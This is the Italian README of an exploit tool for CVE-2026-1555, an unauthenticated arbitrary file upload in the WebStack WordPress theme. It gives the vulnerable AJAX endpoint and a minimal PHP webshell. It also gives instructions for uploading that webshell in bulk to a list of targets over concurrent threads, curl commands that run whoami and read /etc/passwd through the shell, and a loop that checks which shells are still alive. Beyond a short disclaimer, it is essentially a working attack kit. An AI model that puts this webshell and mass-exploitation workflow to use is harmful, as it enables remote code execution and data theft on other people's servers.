
WebStack <= 1.2024 - Caricamento arbitrario di file senza autenticazione
WebStack <= 1.2024 - Caricamento Arbitrario di File Non Autenticato
Esecuzione Remota di Codice Non Autenticata tramite il gestore AJAX img_upload
La funzione io_img_upload() registrata nell'hook d'azione img_upload di WordPress admin-ajax.php non esegue alcuna validazione del tipo di file o dell'estensione prima di scrivere il file caricato sul server. Poiché l'azione è registrata senza controlli di autenticazione (wp_ajax_nopriv_), qualsiasi attaccante remoto non autenticato può inviare un file arbitrario — inclusa una webshell PHP — e il server lo memorizzerà in un percorso accessibile pubblicamente, consentendo l'esecuzione remota di codice diretta.
Endpoint vulnerabile:
POST /wp-admin/admin-ajax.php
action=img_upload
files=@<payload>
uploaded_paths.txtVersione Python: 3.8+
Installa le dipendenze:
pip install requests rich urllib3
Crea un file chiamato list.txt (o qualsiasi altro nome preferisci) con un target per riga:
https://target1.com
https://target2.com
http://target3.com
I target senza
http://ohttps://vengono automaticamente preceduti dahttp://.
Posiziona la tua webshell nella stessa directory dello script. Esempio:
# Minima webshell PHP
echo '<?php system($_GET["cmd"]); ?>' > shell.php
python CVE-2026-1555.py
Ti verranno richiesti:
Ogni caricamento riuscito stampa:
╭─ IMG_UPLOAD ──────────────────────────────────╮
│ Upload successful │
│ │
│ Target: https://target.com │
│ Shell URL: https://target.com/wp-content/... │
╰────────────────────────────────────────────────╯
Tutti gli URL delle shell riuscite vengono aggiunti a:
uploaded_paths.txt
Dopo un caricamento riuscito, accedi alla shell direttamente tramite browser o curl:
# Browser
https://target.com/wp-content/uploads/shell.php?cmd=id
# curl
curl "https://target.com/wp-content/uploads/shell.php?cmd=whoami"
# Esecuzione completa dei comandi
curl "https://target.com/wp-content/uploads/shell.php?cmd=cat+/etc/passwd"
Il percorso esatto di caricamento viene estratto dalla risposta JSON del server (
data.src) e stampato automaticamente.
Verifica rapidamente tutte le shell caricate dal file di output:
while read url; do
echo -n "[*] $url -> "
curl -sk "$url?cmd=id" 2>/dev/null || echo "DEAD"
done < uploaded_paths.txt
Al termine di ogni esecuzione, viene stampato un riepilogo:
Summary 50/50 OK: 12 FAIL: 38
╭──────────────────────────────────────────╮
│ Shell URLs saved to uploaded_paths.txt │
╰──────────────────────────────────────────╯
CVE-2026-1555.py ← Main exploit script
list.txt ← Target URLs (one per line)
shell.php ← Payload to upload
uploaded_paths.txt ← Auto-generated: successful shell URLs
Questo strumento è fornito esclusivamente per test di penetrazione autorizzati, ricerca sulla sicurezza e scopi educativi.
L'autore — Nxploited — non si assume alcuna responsabilità per usi impropri, danni o attività illegali compiute con questo strumento. Utilizzando questo strumento, confermi di avere un'autorizzazione scritta esplicita per testare tutti i sistemi target.
L'uso non autorizzato contro sistemi che non possiedi o per i quali non hai il permesso esplicito di testare è illegale e può comportare un procedimento penale ai sensi delle leggi applicabili sui crimini informatici.
Usalo in modo responsabile. Sei l'unico responsabile delle tue azioni.
👤 Autore: Nxploited 📣 Canale: Nxploited ZeroDay Hub 💬 Telegram: @KNxploited
| Campo | Dettaglio |
|---|
| ID CVE | CVE-2026-1555 |
| Componente Interessato | Tema WebStack per WordPress |
| Versioni Vulnerabili | Tutte le versioni fino alla 1.2024 inclusa |
| Tipo di Vulnerabilità | Caricamento Arbitrario di File → Esecuzione Remota di Codice |
| Autenticazione Richiesta | ❌ Nessuna (Non autenticato) |
| Punteggio CVSS | 9.8 CRITICAL |
| Vettore CVSS | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CNA | Wordfence |
| Prompt | Descrizione | Default |
|---|
Targets file | Percorso del tuo elenco di target | list.txt |
Threads | Numero di worker concorrenti | 6 |
Local file to upload | Nome del file del tuo payload (nella directory dello script) | shell.php |